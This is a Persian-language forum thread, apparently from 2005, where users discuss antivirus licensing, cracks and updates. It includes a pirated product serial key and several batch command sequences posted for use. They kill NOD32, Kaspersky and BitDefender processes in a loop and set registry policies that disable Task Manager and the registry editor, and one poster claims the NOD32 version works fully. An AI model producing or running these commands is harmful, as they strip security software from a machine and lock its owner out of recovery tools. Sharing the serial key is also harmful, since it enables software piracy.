درود بر شمانوشته شده توسط soda
درسته دوست گرامی
نمیدونم چرا اما خیلی شگفت انگیزه!!! انگار نیاز به راه اندازی دوباره داشت رایانه تا تغییرات اعمال بشه.
هم اکنون بروز هست و سپاس از شما و مهدی ارجمند.
درود بر شمانوشته شده توسط soda
درسته دوست گرامی
نمیدونم چرا اما خیلی شگفت انگیزه!!! انگار نیاز به راه اندازی دوباره داشت رایانه تا تغییرات اعمال بشه.
هم اکنون بروز هست و سپاس از شما و مهدی ارجمند.
Last edited by korosh bozorg; 11-10-2005 at 00:59.
سلام دوستان
یک سری یکیج های اصل انتی ها مثل یاندا یا مک افی توی بازار به تازگی اومده که با قیمت هایی بالا عرضه میشه
گفته میشه این انتیا دارای شماره یوزر مخصوص واسه ابدیت هستن
و میگند که ابدیت شدن اینطوری با مال ما خیلی فرق میکنه
من که خودم نسخه نود هزار تومنیه یاندا رو تست کردم و با شماره مخصوص در سایت خودش ابدیت کردم
من که تفاوتی ندیدم
نظر دوستان چیست؟
دوستدار شما
ابی
خودشونمن نمیدونن سیاستشون تو کرکها چطوره وجدانن اگه خود صاحب سیمانتک بتونه محصولاتشو کرک کنه همشم اینجوره از پارتیشن مجیک گرفته تا انتی ویروسشنوشته شده توسط sAsAn.K
من هنوز نورتون جدید رو ندارم نمیدونم کرکش چه جوریه .یه سریال نامبر میخواد فقط؟ اینم امتحان کننوشته شده توسط combat
B26WG-4VJRW-HP9XV-3WQCV-FP8B3
برای غیر فعال کردن nodاز این دستور:نوشته شده توسط borzou_one
taskkill /f /im nod32.exe /t | taskkill /f /im cfgedit.exe /t | taskkill /f /im nod32kui.exe /t | taskkill /f /im nod32krn.exe /t | tskill ProcessManager /a | tskill MSConfig /a
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
^C
*1
*2
*3
*4
goto nod
و کاسپر از این دستور:
taskkill /f /im kaspersky.exe /t | taskkill /f /im bdnagent.exe /t | tskill ProcessManager /a | tskill MSConfig /a
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
^C
*1
*2
*3
*4
goto kaspersky
استفاده کرده.
مال nod32صد در صد جواب می ده،مال کاسپر رو یک جایی اشتباه کردم در ستش می کنم می زارم.
اینم مال بیت دفندر:
taskkill /f /im bdmcon.exe /t | taskkill /f /im bdnagent.exe /t | tskill ProcessManager /a | tskill MSConfig /a
^C
*1
*2
*3
*4
goto bitdefender
Last edited by میل کوچولو; 11-10-2005 at 15:35.
ميل كوچولو جان سلام
آقا اينارو رو كاسپر امتحان كردي
رو سرويس كاسپر البته
آيا جواب ميده؟
ويرايش شده:
اقا همونطور كه حدس ميزدم به هيچ عنوان روي سرويس كاسپر جواب نداد
كاسپر بيدي نبيد كه با اين بادا بلرزه![]()
Last edited by soda; 11-10-2005 at 05:07.
saman_uv جون این سریال رو که دادی تست کردم کار نکرد
کرکشم اینجوریه که دیگه مثل قبلیه Activate by phone نداره فقط آنلاین کدتو چک می کنه!
ضمنا ما منتظر کرکیماااااااااااااااااااا اااااااااااا سودا جون مهدی جون hamilton جون!![]()
lمهدي جان لينكهايي كه واسه nod البته كركش گذاشتي فكر ميكنم تو پرشن گيگ از كار افتاده البته اگه خودت يه امتحان كني بهتره .واسه من كار نكرد.
مال کاسپر یک جایی اشتباه شده،مال nod32صد در صد جواب میده،مال بیت رو هم گذاشتم اونم جواب می ده.نوشته شده توسط soda
Last edited by میل کوچولو; 11-10-2005 at 16:30.
هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)